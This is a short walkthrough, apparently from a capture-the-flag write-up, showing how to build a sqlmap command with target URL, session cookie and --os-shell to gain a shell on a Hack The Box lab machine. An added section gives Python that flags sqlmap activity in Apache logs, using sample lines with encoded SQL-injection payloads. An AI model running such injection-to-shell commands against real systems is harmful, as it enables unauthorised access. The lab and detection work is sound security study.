Basics - How to use sqlmap


sqlmap is used in the HTB machine Vaccine



First, let's view sqlmap's help using:

sqlmap -h

This will help us structure our sqlmap command.



1. We need to provide the target URL

--url="http://10.129.247.166/dashboard.php?search=sandy"


2. We need to provide the PHPSESSID cookie

--cookie="PHPSESSID=530lii3ob5pbh3hii8rifld73o"


3. We need to add --os-shell to get a shell

--os-shell tells sqlmap to prompt for an interactive operating system shell



With all that info we can now construct our command as follows:

sqlmap --url="http://10.129.247.166/dashboard.php?search=sandy" --cookie="PHPSESSID=530lii3ob5pbh3hii8rifld73o" --os-shell

Your IP and your PHPSESSID will be different from mine.

You will now be prompted to enter Y or N a couple of times. Press Enter each time to accept the default.



We got the shell!
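
From the web server's side, a run like the one above leaves a recognisable trail in the access log. The following is an added example, not part of the original post: it scans Apache combined-format log lines for sqlmap's default User-Agent and for one client sending several distinct SQL-like values in the search parameter. The log lines, client IPs and the function name find_sqlmap_activity are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache combined log format (not from the original post).
SAMPLE_LOG = """\
10.10.14.5 - - [01/Jan/2024:10:00:01 +0000] "GET /dashboard.php?search=sandy HTTP/1.1" 200 2312 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.10.14.7 - - [01/Jan/2024:10:00:03 +0000] "GET /dashboard.php?search=o%27brien HTTP/1.1" 200 2312 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.10.14.9 - - [01/Jan/2024:10:00:05 +0000] "GET /dashboard.php?search=sandy%27%20AND%201%3D1--%20 HTTP/1.1" 200 2312 "-" "sqlmap/1.7.2#stable (https://sqlmap.org)"
10.10.14.9 - - [01/Jan/2024:10:00:06 +0000] "GET /dashboard.php?search=sandy%27%20UNION%20SELECT%20NULL--%20 HTTP/1.1" 200 2312 "-" "sqlmap/1.7.2#stable (https://sqlmap.org)"
10.10.14.11 - - [01/Jan/2024:10:00:08 +0000] "GET /dashboard.php?search=sandy%27%20AND%202%3D2--%20 HTTP/1.1" 200 2312 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.10.14.11 - - [01/Jan/2024:10:00:09 +0000] "GET /dashboard.php?search=sandy%27%20ORDER%20BY%201--%20 HTTP/1.1" 200 2312 "-" "Mozilla/5.0 (X11; Linux x86_64)"
"""

# Captures: client IP, request target, User-Agent.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d+ \S+ "[^"]*" "([^"]*)"')
# Characters and keywords that rarely appear in an ordinary search term.
SQLI_RE = re.compile(r"'|--|;|\bunion\b|\bselect\b|\bsleep\s*\(", re.I)

def find_sqlmap_activity(log_text, param="search", min_hits=2):
    """Return {client_ip: sorted list of reasons} for clients that look like sqlmap."""
    reasons = defaultdict(set)
    suspicious = defaultdict(set)  # distinct SQL-like values of `param` per client
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not in combined log format, skip it
        ip, target, agent = m.groups()
        # sqlmap's default User-Agent begins with "sqlmap/". The header is
        # client-controlled, so it is a strong signal but not the only check.
        if agent.lower().startswith("sqlmap/"):
            reasons[ip].add("default sqlmap User-Agent")
        # parse_qs URL-decodes the values, so encoded payloads are matched too.
        for value in parse_qs(urlsplit(target).query).get(param, []):
            if SQLI_RE.search(value):
                suspicious[ip].add(value)
    # One odd value (e.g. a surname with an apostrophe) is not enough to flag.
    for ip, values in suspicious.items():
        if len(values) >= min_hits:
            reasons[ip].add(f"{len(values)} distinct SQL-like values in '{param}'")
    return {ip: sorted(r) for ip, r in reasons.items()}

if __name__ == "__main__":
    for ip, why in find_sqlmap_activity(SAMPLE_LOG).items():
        print(ip, "->", "; ".join(why))
```

Against a real server, feed it the contents of the access log and tune min_hits to the amount of legitimate search traffic.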

